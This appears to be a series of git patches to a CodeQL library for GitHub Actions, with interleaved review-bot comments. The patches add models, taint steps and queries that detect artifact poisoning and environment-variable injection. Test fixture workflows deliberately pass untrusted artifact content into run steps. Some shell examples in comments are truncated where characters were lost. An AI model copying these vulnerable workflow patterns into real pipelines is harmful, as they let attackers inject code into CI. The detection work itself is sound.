Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index b4a099672a4..4431d865417 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -9,16 +9,12 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | 
.github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | @@ -40,9 +36,7 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | -| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 8289bf97b9da5faae3fc46125c6516e1939e96f2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 11:10:01 +0200 Subject: [PATCH 0406/1267] feat(models): Add support for artifact to step output --- .../codeql/actions/dataflow/ExternalFlow.qll | 9 ++++- ql/lib/ext/manual/read-file-actions.model.yml | 33 +++++++++++++++++++ .../.github/workflows/artifactpoisoning5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 6 ++++ .../CWE-094/CodeInjectionMedium.expected | 5 +++ 5 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 ql/lib/ext/manual/read-file-actions.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 1d1b0c6a719..9ddba387b51 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,7 @@ +private import actions private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow -private import actions +private import codeql.actions.security.ArtifactPoisoningQuery /** * MaD sources @@ -91,6 +92,12 @@ predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::Conte or input.trim().matches("input.%") and pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + exists(UntrustedArtifactDownloadStep download | + pred.asExpr() = download and + download.getAFollowingStep() = uses + ) ) and succ.asExpr() = uses ) diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml new file mode 100644 index 00000000000..1b9bd745a65 --- /dev/null +++ b/ql/lib/ext/manual/read-file-actions.model.yml 
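Review bot: The new `input.trim() = "artifact"` branch in `madStoreStep` ties every `UntrustedArtifactDownloadStep` to any later modelled `uses` step through `download.getAFollowingStep() = uses`, and nothing visible in the hunk compares the download location with the file the action is asked to read. A read-file step that reads a checked-in file after an unrelated artifact download would therefore be reported as tainted, which looks like a deliberate over-approximation but is not stated anywhere. I would document the pseudo-input where it is handled, for example `// "artifact": the action reads a file from the workspace; any earlier untrusted artifact download in the job is treated as its input (paths are not compared)`. The body of `madStoreStep` starts outside this hunk, so the version handling for these models cannot be checked from here.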
@@ -0,0 +1,33 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] + - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"] + - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"] + - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"] + - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"] + - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"] + - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"] + - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"] + - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"] + - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"] + - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"] + - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"] + - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"] + - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", 
"manual"] + - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"] + - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml index 633c45661e5..4a2b9b50eb6 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml @@ -19,5 +19,5 @@ jobs: with: path: ./artifact.txt - name: Use artifact - run: echo ${{ steps.artifact.outputs.contents }} + run: echo ${{ steps.artifact.outputs.content }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 370241c7ac0..2e0f79da4a0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -9,6 +9,8 @@ edges | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:43:25 +0200 Subject: [PATCH 0407/1267] feat(models): Add dotenv models Envvar-injection sinks --- ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml | 6 ++++++ ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/akefirad_loadenv-action.model.yml | 7 +++++++ ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml | 6 ++++++ ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml | 6 ++++++ .../manual/luizfelipelaviola_parse-plain-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/read-file-actions.model.yml | 4 ++++ ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 6 ++++++ 8 files changed, 47 insertions(+) create mode 100644 ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml create mode 100644 ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml create mode 100644 ql/lib/ext/manual/akefirad_loadenv-action.model.yml create mode 100644 ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml create mode 100644 ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml create mode 100644 ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml create mode 100644 ql/lib/ext/manual/xom9ikk_dotenv.model.yml diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml new file mode 100644 index 00000000000..ad7fb8a538c --- /dev/null +++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml new file mode 100644 index 00000000000..cf23452f7a9 --- /dev/null 
+++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml new file mode 100644 index 00000000000..8f14138168c --- /dev/null +++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] + diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml new file mode 100644 index 00000000000..264c3f7b242 --- /dev/null +++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml new file mode 100644 index 00000000000..f00774d1c4a --- /dev/null +++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml new file mode 100644 index 00000000000..c7474549fcb --- /dev/null +++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml index 1b9bd745a65..3d92eaef263 100644 --- a/ql/lib/ext/manual/read-file-actions.model.yml +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -31,3 +31,7 @@ extensions: - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"] + - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"] + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"] + - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml new file mode 100644 index 00000000000..bfbd4e2f729 --- /dev/null +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] From 5785a21d5675e6fba491b6104c6402649cb99496 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:44:25 +0200 Subject: [PATCH 0408/1267] feat(queries): Env-var injection Enable Uses sinks for envvar injection --- .../codeql/actions/dataflow/ExternalFlow.qll | 20 +++++++++++-------- .../actions/security/EnvVarInjectionQuery.qll | 13 ++++++++++++ .../CWE-077/EnvVarInjectionCritical.ql | 6 +++++- .../Security/CWE-077/EnvVarInjectionMedium.ql | 6 +++++- 4 files changed, 35 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 9ddba387b51..2914dac5f0a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -110,18 +110,22 @@ predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and - ( - if input.trim().matches("env.%") - then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() - ) and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + sink.asExpr() = uses ) ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f5a3b5f89a8..8dba1a21c90 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
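Review bot: The comment `// pred provenance` in `madSink` labels the block that picks the sink expression, but this predicate has no `pred`; the wording looks carried over from the store-step predicate. The new `input.trim() = "artifact"` branch also makes the whole `uses` step the sink with no condition of its own, so the finding depends entirely on a separate flow step linking an untrusted download to that step, and that is worth saying here. I would replace the comment with `// sink location: an in-scope env var, an action input, or the step itself for actions that read files from the workspace`.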
@@ -45,6 +45,19 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } } +/** + * Holds if a 3rd party action declares an environment variable with contents from an untrusted file. + * e.g. + *- name: Load .env file + * uses: aarcangeli/load-dotenv@v1.0.0 + * with: + * path: 'backend/new' + * filenames: | + * .env + * .env.test + * quiet: false + * if-file-not-found: error + */ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 320feb4e133..89e1ddd3cc2 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index bccb61ae6ea..70c05fc1c95 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql 
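Review bot: The QLDoc added above `EnvVarInjectionFromMaDSink` is phrased as a predicate ("Holds if ...") although it documents a class, and it describes only file-reading actions, while the characteristic predicate `madSink(this, "envvar-injection")` accepts every model of that kind, including the `input.*` ones added in the previous patch. I would open it with `A step or argument of a third-party action that is modelled (MaD) as an environment variable injection sink, e.g. an action that loads a .env file.` and keep the workflow snippet as the example. The first example line reads ` *- name:` and should be ` * - name:` so that it lines up with the rest of the comment.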
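Review bot: The added disjunct `madSink(sink.getNode(), "envvar-injection")` in the `where` clause of EnvVarInjectionCritical.ql repeats what the class `EnvVarInjectionFromMaDSink` already expresses, and the query now imports `codeql.actions.dataflow.ExternalFlow` only for that call; the same two changes are made in EnvVarInjectionMedium.ql in the next file section. Writing it as `sink.getNode() instanceof EnvVarInjectionFromFileReadSink or sink.getNode() instanceof EnvVarInjectionFromMaDSink` keeps the sink definition in one place, so a later change to the MaD sink class cannot drift away from the two queries. The extra import should then be unnecessary, assuming the class is exported by `EnvVarInjectionQuery` as the hunk above suggests.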
@@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", From e0a075da57ce4dd67a658251af54731f04a3d0e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:06 +0200 Subject: [PATCH 0409/1267] feat(dataflow): Flow through bash assigments on artifact to GH env/output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 82 +++++++++++++++++--- 1 file changed, 72 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5e624798d69..3caf80b7ca8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -156,24 +156,72 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) and + ( + // A file is read and its content is assigned to an env var + // - run: | + // foo=$(> "$GITHUB_ENV" + exists(string var_name, string line, string assignment_regexp, string file_read | + run.getScript().splitAt("\n") = line and + assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and + var_name = line.regexpCapture(assignment_regexp, 1) and + file_read = line.regexpCapture(assignment_regexp, 2) and + outputsPartialFileContent(file_read) and + envToRunExpr(var_name, run, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + ) + or + // A file is read and its content is assigned to an output + // - run: echo "foo=$(> "$GITHUB_ENV" + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and + outputsPartialFileContent(value) + ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and 
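Review bot: The assignment pattern `"([a-zA-Z0-9\\-_]+)=(.*)"` in `artifactToEnvStoreStep` is applied with `line.regexpCapture(...)`, which as far as I know has to match the whole line, so an assignment that is indented inside an `if` or loop, or prefixed with `export`, is not recognised and the flow from the artifact to `$GITHUB_ENV` is silently missed. The character class also admits `-`, which cannot appear in a shell variable name. I would use `assignment_regexp = "\\s*(?:export\\s+)?([a-zA-Z_][a-zA-Z0-9_]*)=(.*)" and` and add a test workflow with an indented assignment. The predicate continues past the end of this hunk, so the effect on the remaining conjuncts should be checked there.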
@@ -185,7 +233,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ -predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { +predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(UntrustedArtifactDownloadStep download, Run run | pred.asExpr() = download and succ.asExpr() = run.getScriptScalar() and @@ -193,6 +241,18 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } +/** + * A download artifact step followed by a envvar-injection uses step . + */ +predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Uses uses | + madSink(succ, "envvar-injection") and + pred.asExpr() = download and + succ.asExpr() = uses and + download.getAFollowingStep() = uses + ) +} + /** * A read of the _files field of the dorny/paths-filter action. */ @@ -254,7 +314,9 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or - artifactDownloadToUseStep(node1, node2) or + artifactDownloadToRunStep(node1, node2) or + artifactDownloadToUsesStep(node1, node2) or + // 3rd party actions dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or From a1787596d242dc4c20392ff4805f25e932e563e2 Mon Sep 17 00:00:00 2001 
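Review bot: The new `artifactDownloadToUsesStep` hard-codes the sink kind with `madSink(succ, "envvar-injection")` inside the general flow-step library, so an `artifact` sink model of any other kind would get no flow from the download step and nothing would signal the gap. Since `succ.asExpr() = uses` already restricts the step to models whose sink is the step itself, `madSink(succ, _)` looks sufficient, though that depends on how `madSink` treats the other input forms. The QLDoc also has a typo; I would write `A download artifact step followed by a uses step that is modelled as a sink reading files from the workspace.`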
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:19 +0200 Subject: [PATCH 0410/1267] feat(tests): Update tests --- ql/test/library-tests/test.expected | 31 +++++++++++++++++++ .../CWE-077/.github/workflows/test7.yml | 25 +++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 +++ .../CWE-077/EnvVarInjectionMedium.expected | 3 ++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 +++++++++ 6 files changed, 93 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 62b04344f39..0139efb0f83 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1083,10 +1083,16 @@ sources | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | | apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | 
@@ -1100,23 +1106,30 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | | aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | | cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | 